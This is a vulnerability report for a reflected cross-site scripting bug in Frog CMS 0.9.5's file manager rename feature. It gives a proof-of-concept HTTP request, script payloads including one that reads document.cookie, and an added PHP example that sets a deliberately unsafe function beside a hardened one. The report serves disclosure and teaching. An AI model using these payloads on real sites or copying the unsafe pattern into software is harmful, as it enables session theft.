Frog CMS 0.9.5 has a reflected Cross Site Scripting Vulnerability #10

Open
Black-l opened this issue May 7, 2018 · 0 comments
Black-l commented May 7, 2018

I have found a reflected Cross Site Scripting Vulnerability.
Log into the system as an administrator role: http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
In the document management office, create a new directory test1:
Files-->test1
payload: "/><script>alert(9527)</script>
Modify the directory test1 name, adding a payload at the directory causes directory errors to trigger cross-site scripting.

I think you can see the following picture to know more.


POC:
POST /FrogCMS1/admin/?/plugin/file_manager/rename HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=131iv8tkh2ddt13m5vm7dd9sd7; frog_auth_user=exp%3D1526631381%26id%3D1%26digest%3Dca43be6ff340d03eaa08eeee29a77658
Connection: close
Upgrade-Insecure-Requests: 1

file%5Bcurrent_name%5D=test1"/><script>alert(9527)</script>&file%5Bnew_name%5D=test1&commit=Rename


payload: "/><script>alert(document.cookie)</script>
Can be used in conjunction with CSRF.

Affected Version:
0.9.5
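
Added example, not part of the original report and not Frog CMS source: a hypothetical PHP error path that reflects the submitted `file[current_name]` value into HTML the way the report describes, beside a hardened version that validates the name and encodes it on output. The function names, the allowlist and the message wording are assumptions.

```php
<?php
// Added illustration; NOT Frog CMS source. Function names and the error
// wording are hypothetical.

// Encode a value for HTML text and quoted-attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allowlist for a single path component: no separators, quotes or markup.
function is_safe_name(string $name): bool
{
    return $name !== '.' && $name !== '..'
        && preg_match('/\A[A-Za-z0-9._ -]{1,128}\z/', $name) === 1;
}

// Weak form: the submitted value is concatenated into HTML unchanged.
function rename_error_unsafe(string $current): string
{
    return '<div class="error">Could not rename ' . $current . '</div>';
}

// Hardened form: reject names outside the allowlist with a fixed message,
// and encode whatever is still reflected.
function rename_error_safe(string $current): string
{
    if (!is_safe_name($current)) {
        return '<div class="error">Invalid file or directory name.</div>';
    }
    return '<div class="error">Could not rename ' . h($current) . '</div>';
}

// Constructed input: the current_name value from the request in the report.
$submitted = 'test1"/><script>alert(9527)</script>';

echo rename_error_unsafe($submitted), PHP_EOL; // markup reaches the page as-is
echo rename_error_safe($submitted), PHP_EOL;   // fixed message, nothing reflected
echo h($submitted), PHP_EOL;                   // the same value, HTML-encoded
```

Validation alone is not the fix: the encoding in `h()` is what keeps a reflected value inert, and it applies to every place the name is written into a page, including attribute values.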
